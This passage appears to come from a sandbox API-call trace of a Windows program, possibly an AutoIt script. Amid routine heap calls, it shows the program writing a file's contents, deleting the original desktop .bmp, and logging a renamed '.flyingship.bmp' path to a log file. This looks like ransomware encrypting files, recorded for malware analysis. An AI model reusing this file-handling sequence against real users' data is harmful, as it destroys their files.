dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0164.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0164.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0164.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0164.993] WriteFile (in: hFile=0x138, lpBuffer=0x8fff00*, nNumberOfBytesToWrite=0x53cf, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0x8fff00*, lpNumberOfBytesWritten=0x87eae0*=0x53cf, lpOverlapped=0x0) returned 1 [0164.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0164.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0164.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0164.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0165.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0165.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0165.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0165.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0165.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0165.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0165.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0165.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0165.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0165.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0165.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0165.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0165.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0165.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0165.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0165.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0165.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0165.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0165.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0165.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0165.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0165.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0165.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0165.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0165.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0165.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0165.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0165.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0165.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0165.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0165.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0165.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0165.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0165.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0165.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0165.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0165.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0165.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0165.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0165.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0165.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0165.001] FreeLibrary (hLibModule=0x75990000) returned 1 [0165.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0165.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0165.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0165.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0165.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0165.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0165.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0165.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0165.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0165.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0165.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0165.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0165.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0165.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0165.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0165.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0165.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0165.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0165.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0165.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0165.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0165.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0165.002] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0165.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0165.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0165.003] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0165.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0165.003] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0165.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0165.003] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0165.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0165.003] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0165.003] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0165.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0165.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0165.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0165.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0165.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0165.003] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0165.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0165.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0165.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0165.004] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0165.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0165.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0165.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0165.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7b0 [0165.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd7b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0165.006] FreeLibrary (hLibModule=0x75990000) returned 1 [0165.006] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0165.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0165.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0165.006] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0165.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0165.006] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0165.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0165.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0165.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0165.006] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp", lpFilePart=0x0) returned 0x45 [0165.007] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee78cb0, ftCreationTime.dwHighDateTime=0x1d5d815, ftLastAccessTime.dwLowDateTime=0x3a5f2470, ftLastAccessTime.dwHighDateTime=0x1d5e4f2, ftLastWriteTime.dwLowDateTime=0x7c50040, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x53cf, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="SEObOseiAS.bmp", cAlternateFileName="SEOBOS~1.BMP")) returned 0x90ae18 [0165.008] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\na3pecvaltbr8vlk\\seoboseias.bmp")) returned 1 [0165.013] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee78cb0, ftCreationTime.dwHighDateTime=0x1d5d815, ftLastAccessTime.dwLowDateTime=0x3a5f2470, ftLastAccessTime.dwHighDateTime=0x1d5e4f2, ftLastWriteTime.dwLowDateTime=0x7c50040, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x53cf, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="SEObOseiAS.bmp", cAlternateFileName="SEOBOS~1.BMP")) returned 0 [0165.013] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0165.014] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.028] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0165.028] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0165.028] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0165.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0165.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0165.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0165.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0165.028] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0165.028] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0165.029] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0165.029] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0165.032] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0165.032] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.032] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0165.032] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.032] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0165.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0165.032] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0165.032] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x9cf, lpOverlapped=0x0) returned 1 [0165.033] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0165.033] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x9cf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.033] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0165.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0165.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0165.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.flyingship.bmp\r\n", cchWideChar=83, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 83 [0165.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.flyingship.bmp\r\n", cchWideChar=83, lpMultiByteStr=0x8c4a48, cbMultiByte=83, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.flyingship.bmp\r\n", lpUsedDefaultChar=0x0) returned 83 [0165.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0165.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0165.033] WriteFile (in: hFile=0x138, lpBuffer=0x9a5d78*, nNumberOfBytesToWrite=0x52, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d78*, lpNumberOfBytesWritten=0x87f43c*=0x52, lpOverlapped=0x0) returned 1 [0165.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0165.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0165.034] CloseHandle (hObject=0x138) returned 1 [0165.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0165.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0165.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0165.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0165.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0165.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0165.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0165.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0165.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0165.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0165.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0165.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0165.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0165.036] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0165.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0165.036] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0165.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0165.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0165.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 